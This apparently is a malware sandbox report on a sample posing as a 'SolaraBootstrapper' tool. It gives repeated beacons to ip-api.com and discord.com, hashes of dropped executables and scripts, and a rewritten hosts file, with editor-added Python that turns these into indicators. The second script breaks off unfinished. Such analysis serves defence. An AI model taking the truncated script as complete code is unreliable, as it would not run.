| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
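The rows above repeat one cycle many times: a DNS query to 8.8.8.8, a TLS connection to discord.com, a plain-HTTP request to ip-api.com, and an occasional PTR lookup. Reading that by eye hides how many distinct endpoints were actually contacted. The Python below is an added example, not part of the report: it parses rows in exactly this table layout, separates resolver traffic from real connections, counts contacts per host and emits a deduplicated IP:port list. SAMPLE_ROWS is a constructed subset of the table; the ROLE labels are the editor's, not sandbox output.

```python
"""Summarise a sandbox network table into a per-host beacon view and IOC list.

Added example, not part of the original report. SAMPLE_ROWS is a constructed
subset of the report's table, in the same "| CC | ip:port | host | proto |" layout.
"""
import re
from collections import Counter, defaultdict

SAMPLE_ROWS = """
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
"""

ROW_RE = re.compile(
    r"^\|\s*(\w{2})\s*\|\s*([\d.]+):(\d+)\s*\|\s*([^|]+?)\s*\|\s*(tcp|udp)\s*\|$"
)

# Editor-assigned labels for the two hosts that matter in this sample.
ROLE = {
    "ip-api.com": "external IP / geolocation lookup over plain HTTP",
    "discord.com": "legitimate service used for C2 or webhook exfiltration",
}


def parse_rows(text):
    """Return (country, ip, port, host, proto) tuples for every well-formed row."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            cc, ip, port, host, proto = m.groups()
            rows.append((cc, ip, int(port), host, proto))
    return rows


def summarise(rows):
    """Split DNS queries (udp/53) from connections; count connections per host and endpoint."""
    lookups = Counter()
    connections = defaultdict(Counter)  # host -> Counter{(ip, port): hits}
    for _cc, ip, port, host, proto in rows:
        if proto == "udp" and port == 53:
            lookups[host] += 1
        else:
            connections[host][(ip, port)] += 1
    return lookups, connections


def iocs(rows):
    """Deduplicated, sorted ip:port destinations, excluding the resolver itself."""
    return sorted(
        {f"{ip}:{port}" for _cc, ip, port, _host, proto in rows if not (proto == "udp" and port == 53)}
    )


def report(text):
    """One line per contacted host, plus PTR lookups that produced no connection."""
    rows = parse_rows(text)
    lookups, connections = summarise(rows)
    lines = []
    for host in sorted(connections):
        dests = connections[host]
        lines.append(
            f"{host}: {sum(dests.values())} connection(s) to {len(dests)} endpoint(s) "
            f"[{ROLE.get(host, 'unclassified')}]"
        )
    for host in sorted(h for h in lookups if h.endswith(".in-addr.arpa")):
        lines.append(f"reverse lookup: {host} (PTR only, no connection)")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_ROWS)))
    print("IOCs:", ", ".join(iocs(parse_rows(SAMPLE_ROWS))))
```

Run against the full table, the summary collapses the repeated cycle to a handful of lines (one per host) and the IOC list to the few Cloudflare, Google and ip-api.com endpoints; the per-host connection count is the number of beacon cycles, which is the figure worth recording.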
Files
memory/3552-0-0x00007FFB58523000-0x00007FFB58525000-memory.dmp
memory/3552-1-0x00000000003D0000-0x000000000072C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
| MD5 | 084ab0f114778618e30666e451581845 |
| SHA1 | 0013eacb10d1f89dff71296defa5db17704d3347 |
| SHA256 | 8cf0041d9b5a8ab1fa037c475de20ba1389711d9d4e80fb9638138840f28c649 |
| SHA512 | 0c20196d8810e5c05c1b0b284804c7aa5f05a41bdcf19eb3c983702f8b176fb6e4000e3b3b2ec1da9f8973c9bc0feca9e4446817731104d174c0ba1fdd85cd06 |
memory/3552-10-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
| MD5 | c05f91c69a98089ded3951424da86771 |
| SHA1 | 0c4c6437efad5f0e1e3e290fb0a9c069cd4a86ed |
| SHA256 | 94c820d3a1216c2ea30f7960f60d8324399a522d3e090711aafc6f5d0b860ac5 |
| SHA512 | 3ba5631dcc8b839ec1d75a408b10047c3a6713791caa5b7d0fa4df69fcd264df50424404d410727c532de77fc95c082faad3cebae1637c87a146c9bf5979fcc7 |
memory/1028-25-0x000002C375CB0000-0x000002C375CF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
| MD5 | 97bec430634bb8e59d4273c9a395a702 |
| SHA1 | a8a04f26cec00ef32501ebe35252d08aaa7e3634 |
| SHA256 | 57a2fe6374ced2c9c7e2be59d3eca0815188778308e59295d6a868d3e5c4237e |
| SHA512 | 8563d6608337071a89f7b0b7739001a456be19c51dea0f715317c6dbfce9986c59527f39ec7cdcc71007abdd8955996d26835105712e80cd700e086b8d1165a9 |
memory/3440-35-0x0000000000610000-0x00000000007C2000-memory.dmp
memory/1028-36-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
memory/3552-37-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
memory/3440-32-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe
| MD5 | fb6995d84ff8765f8985b39021495a02 |
| SHA1 | da911e465774c0769bc5b6fb10801c08e769b607 |
| SHA256 | 048d54b81f8126090f61d30d736d677fe62a4eb683b5a7618c91020e7fc10ff5 |
| SHA512 | ea763e3864f726cd58979dee75100cce8692e81ca67fbbcf863f5244c7a127580b71588a2675bc108599109e8e77af7351f85900d0afb65acb98eeb4100632db |
memory/684-47-0x000001A5EA350000-0x000001A5EA372000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cx5biz4n.b2x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3440-70-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/1028-86-0x000002C3783E0000-0x000002C378456000-memory.dmp
memory/1028-87-0x000002C3784B0000-0x000002C378500000-memory.dmp
memory/1028-88-0x000002C378360000-0x000002C37837E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 985b3105d8889886d6fd953575c54e08 |
| SHA1 | 0f9a041240a344d82bac0a180520e7982c15f3cd |
| SHA256 | 5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d |
| SHA512 | 0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 276798eeb29a49dc6e199768bc9c2e71 |
| SHA1 | 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b |
| SHA256 | cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc |
| SHA512 | 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SolaraBootstrapper.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/1028-126-0x000002C3783A0000-0x000002C3783AA000-memory.dmp
memory/1028-127-0x000002C378460000-0x000002C378472000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dIIhost.exe.log
| MD5 | 4c8fa14eeeeda6fe76a08d14e08bf756 |
| SHA1 | 30003b6798090ec74eb477bbed88e086f8552976 |
| SHA256 | 7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5 |
| SHA512 | 116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d2932b2d6c762219b89d39dd11312e00 |
| SHA1 | 00889ebbf99006d613f52ebbe020aa929047704f |
| SHA256 | 97265e6a6d22bb41ad2a3da792f17177fb4193212fc61758473ce5179103b92a |
| SHA512 | 549b5f6ade05038909090dea05f2a314e4ff3e3e88adb3a9d414ccab7dcd17ab5db6598f8df3fdd1e4b45ccd0be28b27153f16cc775c9a584056c7ea25238901 |
memory/1028-164-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp
C:\WinRAR\jLO855Jnqn959BA8qy.bat
| MD5 | cbad1e030a37190ced948f45d7582691 |
| SHA1 | b1590dc4a67cd1b56b6b0ff42d48325de7bb8ea5 |
| SHA256 | 8d910a7da0bc8d3baf495648cc0fef5391e8d7486cfc027827d3828a488f7571 |
| SHA512 | ce98091245080506c15afd1eba8847e410b43c689ef38b4c971881a0888588cbac39234d73f783ad4f4f113c7fe07d066d4f5e1a2181854b70a032f4308fca92 |
C:\WinRAR\UnZiper.exe
| MD5 | c06bb1f0ea507c8d8767f269725df3c0 |
| SHA1 | 9555e62e99b3bd5af80e7870ab15c38dc97c1757 |
| SHA256 | 43d0e85345ce2caf4c9b2805c7e5da6a6f7c523f256a46cfeebea9a0eb4f5dce |
| SHA512 | 0a14e81ab09263b75f4be83f11cfcd1e9bc903d22aeeae0bf797a97bb261e5700a55bcc3e65ff48a41c01170686e42a756bfabb1769d0efd2b58e62d83bb6197 |
memory/628-169-0x0000000000480000-0x0000000000652000-memory.dmp
memory/628-170-0x0000000002740000-0x000000000274E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8916e154c5f09e8e26780ab9a279d25f |
| SHA1 | 25b1b7a637cb3f57329efbfccdc9ed9b67da30b2 |
| SHA256 | 3881bf61c694a3f517c78904a36efff7812c2664d4965de471b36737f7c90075 |
| SHA512 | 38baf68637754aee48205a854eb7f74619390e6bc1fcb0cdcc397a696ce7441d9f9e90ed7a66c22c6fc073eacc17cd7e45afeab833b2909f92259a2bc1b8a26f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UnZiper.exe.log
| MD5 | 5cb90c90e96a3b36461ed44d339d02e5 |
| SHA1 | 5508281a22cca7757bc4fbdb0a8e885c9f596a04 |
| SHA256 | 34c15d8e79fef4bddec7e34f3426df3b68f8fc6deac29ea12d110f6c529fe3bb |
| SHA512 | 63735938c841c28824e3482559df18839930acc5ea8600b1074439b70a2f600a92f41593568e49991f25f079e7f7361b4f1678feadbf004f6e9e4d51d36598d4 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 4028457913f9d08b06137643fe3e01bc |
| SHA1 | a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14 |
| SHA256 | 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58 |
| SHA512 | c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5824a6037c081fda5d46de274b6e2799 |
| SHA1 | 526367a09300cbde430e8fb44e41cbe7a0937aac |
| SHA256 | 4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f |
| SHA512 | a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 227556da5e65f6819f477756808c17e4 |
| SHA1 | 6ffce766e881ca2a60180bb25f4981b183f78279 |
| SHA256 | 101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4 |
| SHA512 | d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 15dd61188e01dff83e0f47d441b21af5 |
| SHA1 | e26521b9eb5c21dd9b9bfb69618e7c80e4847bc9 |
| SHA256 | 2f1d635b20401a13d3e43f797200c4b99d2dadbb1e01e6ab8cc5348783b193c6 |
| SHA512 | e40ad249392a90107d5448bee92ef45bf9164c2a106a39d2ea7b93ce22fce72af8a6732bac83fef32fbaefd915d51a0143c3e7409e74b17e0ce063c6d32100ed |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 724bc7abdbaa4bb021d728aac3000af1 |
| SHA1 | 8bb319c3ef68cf5db7d56a1e397c94ca65d2cce6 |
| SHA256 | 07d38b887ae11e664a613dc698d8de4771dec3cdb7837d59b00f421114e27c04 |
| SHA512 | 501872716cea55c46ccb0c5ccf6835733f84e5a653a285729b6757c38952a582985fb7c76643cda0b32390ea9bca4de35d2fbe34ba1c6f3106f803225cafd88e |
C:\Users\Admin\AppData\Local\Temp\JipzecQmszbCJX3
| MD5 | 42c395b8db48b6ce3d34c301d1eba9d5 |
| SHA1 | b7cfa3de344814bec105391663c0df4a74310996 |
| SHA256 | 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d |
| SHA512 | 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845 |
C:\Users\Admin\AppData\Local\Temp\x1dZQdFlu5oiJDr
| MD5 | 8f5942354d3809f865f9767eddf51314 |
| SHA1 | 20be11c0d42fc0cef53931ea9152b55082d1a11e |
| SHA256 | 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea |
| SHA512 | fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218 |
C:\Users\Admin\AppData\Local\Temp\VoUbehJLiQRPcfk
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\VoUbehJLiQRPcfk
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0b8cb2e6dd5794b6a56a4bdbbd430fd7 |
| SHA1 | 2b08e348c3489c6a35761af073018e3784c12074 |
| SHA256 | bcce0d44e33747e4c39df9afbd0a4e98a47ded0188375e4dfdd94cafbb366e1f |
| SHA512 | 15ce3b588aa80899f69b0313c7e188d886bddbd09783ca732ac33f9ae8e4e017a72b6f98919f581383a4582732575e5faedb0dea87e01cf2b657424945fdf4d2 |
C:\Users\Admin\AppData\Local\Temp\WGP0m3Wo7NZp8LM\Display\Display.png
| MD5 | d4b4ba038423239047a9130a6a741659 |
| SHA1 | a0d511e38fc7e0112d3237257b87211e5b9d0d51 |
| SHA256 | ee0f530848adf85e4d4d51fc8ab61df06faa59a980637e80bbce32377c37d8d1 |
| SHA512 | c370d44d83acdd599de432538717948be1f837940fa2d3d54fe34caa75e0030154e6d1c0fae96894c685c333e280b0fd526d3d5899f16b37ac32b440dd9a519c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 548dd08570d121a65e82abb7171cae1c |
| SHA1 | 1a1b5084b3a78f3acd0d811cc79dbcac121217ab |
| SHA256 | cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc |
| SHA512 | 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6aae9fb57ebd2ae201e8d174d820246 |
| SHA1 | 58140d968de47bcf9c78938988a99369bbdb1f51 |
| SHA256 | bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08 |
| SHA512 | 5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 966914e2e771de7a4a57a95b6ecfa8a9 |
| SHA1 | 7a32282fd51dd032967ed4d9a40cc57e265aeff2 |
| SHA256 | 98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba |
| SHA512 | dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eeb6ad386d143f278077171fc01a81e8 |
| SHA1 | 43cff1bd7240965bfb2f10e47c0cec0f94332e2d |
| SHA256 | 59d62f9472b4c00b7cae0ee702789fa2b0042c468e4de9421d2430f9973eb00d |
| SHA512 | b40f003e6d97adaaf05809f06d12df01984943d9eb6c44eaeffef90df8de0040373150c9714b11a42db5189b7064eeed0609a39f6f1feb91b05dd1835333e8f2 |
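Most entries in the Files list are PowerShell and .NET runtime artefacts (StartupProfileData-NonInteractive, CLR_v4.0\UsageLogs\*.log, __PSScriptPolicyTest_*.ps1) whose hashes change every run and are useless as indicators; the dropped executables, the staged .vbe and .bat, and the rewritten hosts file are the entries worth keeping. The Python below is an added example, not part of the report: it parses this block (a path line followed by "| ALGO | hex |" rows, with memory/... lines marking in-memory dumps rather than files), sorts entries into dropped artefacts, modified system files and runtime noise, and recovers from the UsageLogs filenames which managed executables actually ran. SAMPLE is a constructed subset of the entries above.

```python
"""Triage the Files block of a sandbox report.

Added example, not part of the original report. SAMPLE is a constructed
subset of the report's entries in the same layout.
"""
import re

SAMPLE = r"""
memory/3552-1-0x00000000003D0000-0x000000000072C000-memory.dmp
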